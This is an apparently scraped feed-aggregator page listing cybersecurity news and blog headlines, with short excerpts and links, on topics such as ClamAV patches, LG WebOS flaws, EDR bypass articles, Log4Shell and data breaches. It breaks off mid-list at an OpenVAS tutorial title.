Today, we are publishing the 1.3.1, 1.2.3, and 1.0.6 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub.The images on Docker Hub may not be immediately available on release day.Continue reading to learn what changed in each version.1.3.1ClamAV 1.3.1 is a critical patch release with the following fixes:CVE-2024-20380: Fixed a possible crash in the HTML file parser that could cause a denial-of-service (DoS) condition.This issue affects version 1.3.0 only and does not affect prior versions.Thank you to Błażej Pawłowski for identifying this issue.GitHub pull requestUpdated select Rust dependencies to the latest versions. This resolved Cargo audit complaints and included...
http://blog.clamav.net/2024/04/clamav-131-123-106-patch-versions.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerabilities Identified in LG WebOS
As the creator of the world's first smart home cybersecurity hub, Bitdefender regularly audits popular IoT hardware for vulnerabilities. This research paper is part of a broader program that aims to shed light on the security of the world's best-sellers in the IoT space. This report covers vulnerabilities discovered while researching the LG WebOS TV operating system.
We have found several issues affecting WebOS versions 4 through 7 running on LG TVs. These vulnerabilities let us gain root acces
https://www.bitdefender.com/en-us/blog/labs/vulnerabilities-identified-in-lg-webos
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AI meets next-gen info stealers in social media malvertising campaigns
The impact that AI has on society has steadily crept into the darkest nooks and crannies of the internet. So much so that cybercrooks are hitching free rides on the AI bandwagon by leveraging the increased demand of AI-powered software for content creators.
Cybercriminal groups constantly adapt their operating methods and tools to stay a step ahead of potential victims. Highly focused on enhancing their deceptive practices, threat actors have, unfortunately, found a most reliable and powerful a
https://www.bitdefender.com/en-us/blog/labs/ai-meets-next-gen-info-stealers-in-social-media-malvertising-campaigns
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Numerous vulnerabilities in Xunlei Accelerator application
Xunlei Accelerator (迅雷客户端) a.k.a. Xunlei Thunder by the China-based Xunlei Ltd. is a wildly popular application. According to the company's annual report 51.1 million active users were counted in December 2022. The company's Google Chrome extension 迅雷下载支持, while not mandatory for using the application, had 28 million users at the time of writing.
I've found this application to expose a massive attack surface. This attack surface is largely accessible to arbitrary websites that an application user happens to be visiting. Some of it can also be accessed from other computers in the same network or by attackers with the ability to intercept user's network connections (Man-in-the-Middle attack).
It does not appear like security concerns were considered in the design...
https://palant.info/2024/03/06/numerous-vulnerabilities-in-xunlei-accelerator-application/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Sponsored Ad Fraud: Mystery Box Scams Flood Social Media
Social media platforms are overflowing with scams.
In the past couple of months, Bitdefender Labs has been monitoring a steep increase in fraudulent social media ads on Facebook promoting various swindles ranging from crypto-doubling to AI-generated celebrity-endorsed giveaways.
Our latest analysis has spotted a consistent trend, with fraudsters continuing to exploit Meta's ad system to deceive consumers.
The hustle? A long-established ruse that involves peddling so-called mystery boxes from
https://www.bitdefender.com/en-us/blog/labs/sponsored-ad-fraud-mystery-box-scams-flood-social-media
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day
The Lazarus Group is back with an upgraded variant of their FudModule rootkit, this time enabled by a zero-day admin-to-kernel vulnerability for CVE-2024-21338. Read this blog for a detailed analysis of this rootkit variant and learn more about several new techniques, including a handle table entry manipulation technique that directly targets Microsoft Defender, CrowdStrike Falcon, and HitmanPro.
The post Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day appeared first on Avast Threat Labs.
https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/?utm_source=rss&utm_medium=rss&utm_campaign=lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
When Stealers Converge: New Variant of Atomic Stealer in the Wild
Here at Bitdefender, we're constantly working on improving detection capabilities for our macOS cyber-security products; part of this effort involves revisiting old (or digging up new) samples from our malware zoo. During routine verifications, we were able to isolate multiple suspicious and undetected macOS disk image files surprisingly small for files of this kind (1.3 MB per file).
A short look into the code revealed that these files are significantly similar to other samples analysed in the
https://www.bitdefender.com/en-us/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable!Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support.The release files are available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub*:Alpine-based imagesDebian-based multi-arch images*The Docker images are built on release day and may not be available until later in the day.Continue reading to learn what changed in each version.1.3.0ClamAV 1.3.0 includes the following improvements and changes:Major changesAdded support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate.You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page.Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies.For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags:clamav/clamav:unstableclamav/clamav:unstable_base clamav/clamav-debian:unstableclamav/clamav-debian:unstable_base This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`.In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`.ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first.
As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon.
Update (2025-01-12): Added Lemmy endpoint which has been fixed by now. Also mentioned...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)
https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...]
The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)
https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Installing Rogue-jndi on Kali Linux
Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged [...]
The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in the Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper , the person who discovered the flaw, the source of the leak is [...]
The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principal of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: Reuters The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register TCP-IP-co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 of past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
US officially warns China is launching cyberattacks to steal coronavirus research
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: CNN The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of m in cyber-attack
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register The Norwegian Investment Fund has been swindled out of m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […]
The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […]
The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Cyber-attacks hit hospital construction companies
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: BBC Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […]
The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […]
The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: The Register Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […]
The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler AD), Citrix Gateway NetScaler ADC (formerly known as NetScaler Gateway), and Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...]
The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...]
The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...]
The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)
Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
